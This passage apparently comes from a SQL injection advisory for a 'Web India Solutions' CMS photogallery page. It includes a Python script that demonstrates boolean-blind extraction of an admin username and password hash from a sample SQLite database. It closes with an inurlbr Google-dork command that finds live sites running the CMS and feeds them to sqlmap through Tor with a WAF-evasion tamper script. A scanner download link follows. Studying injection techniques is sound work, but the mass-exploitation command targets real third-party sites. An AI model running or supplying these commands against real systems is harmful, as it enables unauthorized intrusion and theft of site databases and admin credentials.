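The three sqlmap payload types listed above differ only in how the answer is read back; the boolean-based blind one (id=34' AND 4678=4678#) gets a single true/false per request and still recovers whole values. The following Python 3 script is an added example, not from the advisory or from sqlmap: a constructed SQLite database stands in for the CMS, gallery(id) is queried by string concatenation the way the vulnerable id parameter is, and the extractor recovers a value from cms_admin (the table the --dump command above targets) using nothing but page comparisons. SQLite's -- replaces MySQL's # as the comment terminator; the table contents are sample data.

```python
"""What a boolean-based blind SQL injection does, step by step."""
import sqlite3

# Constructed stand-in for the CMS database (sample data, not real).
con = sqlite3.connect(":memory:")
con.executescript("""
CREATE TABLE gallery (id INTEGER, title TEXT);
INSERT INTO gallery VALUES (34, 'Summer collection');
CREATE TABLE cms_admin (id INTEGER, username TEXT, password_hash TEXT);
INSERT INTO cms_admin VALUES (1, 'admin', 'e10adc3949ba59abbe56e057f20f883e');
""")


def vulnerable_page(id_param):
    """Stands in for photogallery_view.php?id=...: the rendered title, or ''."""
    sql = "SELECT title FROM gallery WHERE id='%s'" % id_param  # no escaping
    rows = con.execute(sql).fetchall()
    return rows[0][0] if rows else ""


def oracle(condition):
    """True iff the page still renders when `condition` is AND-ed onto the id.

    Mirrors  id=34' AND 4678=4678#  with SQLite's '--' as the comment.
    """
    baseline = vulnerable_page("34")
    probe = vulnerable_page("34' AND (%s)--" % condition)
    return probe != "" and probe == baseline


def blind_extract(subquery, max_len=64):
    """Recover the string returned by `subquery` through the oracle alone."""
    # 1. length: one yes/no question per candidate length
    length = 0
    for n in range(1, max_len + 1):
        if oracle("LENGTH((%s))=%d" % (subquery, n)):
            length = n
            break
    # 2. each character by binary search over the ASCII range:
    #    7 questions per position instead of up to 127 equality tests
    chars = []
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("UNICODE(SUBSTR((%s),%d,1))>%d" % (subquery, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


if __name__ == "__main__":
    print(blind_extract("SELECT username FROM cms_admin WHERE id=1"))
    print(blind_extract("SELECT password_hash FROM cms_admin WHERE id=1"))
```

The time-based payload in the advisory (SLEEP(5)) is the same loop with the oracle replaced by a response-time threshold, for pages whose content does not visibly change; the UNION payload is the fast path used when the page echoes a column directly.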



[+] EXPLORING WITH MASS INURLBR:
php inurlbr.php --dork 'intext:"Web India Solutions" & inurl:"php?id="' -s sqli.txt  -q 1,6 --exploit-get "?&id=1%270x27" --command-vul "sqlmap.py -u '_TARGETFULL_' -p id --random-agent --beep --level 3 --risk 2 --threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch --tamper modsecurityzeroversioned.py"



[+] DOWNLOAD SCANNER: 
https://github.com/googleinurl/SCANNER-INURLBR

